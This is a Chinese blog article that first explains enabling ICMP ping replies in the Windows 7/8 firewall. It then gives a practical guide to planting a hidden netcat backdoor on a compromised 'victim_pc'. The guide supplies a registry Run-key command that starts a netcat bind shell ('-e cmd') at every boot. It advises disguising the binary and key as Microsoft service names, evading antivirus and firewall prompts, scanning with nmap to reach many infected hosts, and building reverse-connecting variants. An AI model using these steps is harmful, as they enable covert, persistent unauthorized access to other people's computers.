这期内容当中小编将会给大家带来有关ping不通win7解决方法以及nc后门的制作是怎样的,文章内容丰富且以专业的角度为大家分析和叙述,阅读完这篇文章希望大家可以有所收获。
默认情况下win7、8是不能被ping通的,出于安全考虑不允许外部主机对其进行Ping测试。(关闭防火墙不能解决此问题!!!)
解决方法:允许ICMP回显,设置如下:
Firewall.cpl——高级设置——入站规则——文件和打印机共享(回显请求 -ICMPv4-In),win7下有两个(域,公用专用),win8下有三个(域,公用,专用),右击启用规则即可,IPV6亦然,个人测试过程中发现其实只要启用公用这一项就Ok了。下面分别是win7和win8的firewall。
nc这把瑞士×××的确是屡试不爽,唯一可惜的就是会被杀软查杀,只能自己做免杀,还好源代码是公开的,懂编程的话可以做源码级别的免杀,下面说下利用nc在内网做不会被杀软查杀的后门,并且无视远程pc用户名密码的修改,连接类型为正向主动型连接。假设通过各种溢出漏洞等拿到了Victim_pc的shell,当然nc需要传过去(这步有点问题,假设本地开了ftp,远程下载nc后会被360查杀,始终想不出有什么好的方法可以下载文件到victim_pc而不被查杀,除了做免杀,求高手指导),然后其实就是开启一个nc监听程序并返回shell,当然这边需要做到开机启动,比较好的方法就是添加到注册表启动项里面,reg add hkey_local_machine/software/microsoft/windows/currentversion/run /v“键值名称” /d “nc –d –L –p port –e cmd /f“,这样就添加到开机启动项里面了,当然此处也需要一点点社工的思想,比如nc的改名,键值名称的改名,你需要写的比较像,因为msconfig以及任务管理器会显示。
这边我只是把nc改成了winsearch,当然完全可以改成能欺骗别人的名字,比如一些MS服务名啦等等。这样重启后victim_pc就会一直监听本地端口,本地就可以连接其ip、port得到其shell,这种后门的好处就是无视杀毒软件的查杀以及用户名密码的修改,原因没有过多深入,觉得应该是nc在杀软前启动的或者至少在杀软监视之前nc已经做好了监听工作。这边也会出现一个问题,就是启动项第一次运行nc工具的时候防火墙会弹出提示,是否允许通过,如果你把名字改的像一点,一般别人是会点击允许的。此外,需要一提的就是假设victim_pc的OS为win7,本地ping不通,但是nc是可以穿透的,无视防火墙的限制。
也许有人会有疑问,既然得到shell后下载本地nc时被查杀,又如何做后续的步骤呢,亦或者nc已经做好了免杀,可以下载到远程pc,那不是随便了么。诚然,这的确是矛盾的地方,所以我说的只是一种思路,不用太钻牛角尖。另外可能会出现的一种情况就是,nc做好免杀后在当时可能是有用的,可是不能保证以后也可以免杀,必须相信杀软的更新速度和技术,所以这种方法还是有一定的参考价值的。
当然这边讲的情况是内网,其实外网也一样,只是你需要搜集对方的ip地址罢了,如果对方在内网,还需要做端口转发。在内网中还有个好处就是如果你给好多台pc都种了此nc后门,那么你完全可以自己写一个批处理程序来进行连接,程序我就不写了,思路如下:先扫描存活主机,当然需要强力一点的扫描软件,首推nmap,防止win7/8 ping不通的情况,接着开启n个nc连接存活主机。
另外这边讲的是正向连接型,有些情况下会被防火墙拦截,当然最好的就是反弹型的后门,其实原理也一样,本地nc监听,victim_pc主动连接,也可以做成开机启动项的形式,只不过需要循环连接本地主机(比如间隔时间为1min),而本地需要连接远端的时候开启监听,有点类似于灰鸽子反弹型***的制作思想,其实远控工具无非就是把一些功能都集成到一起罢了。
此外不得不提的就是nc强大的功能,可以收发邮件,可以端口转发做中继,可以ftp,可以发送接收文件,还可以扫描ip、port,简直是无所不能,不得不注意的是它的大小仅仅只有60K。
上述就是小编为大家分享的ping不通win7解决方法以及nc后门的制作是怎样的了,如果刚好有类似的疑惑,不妨参照上述分析进行理解。如果想知道更多相关知识,欢迎关注亿速云行业资讯频道。
原创文章,作者:306829225,如若转载,请注明出处:https://blog.ytso.com/227514.html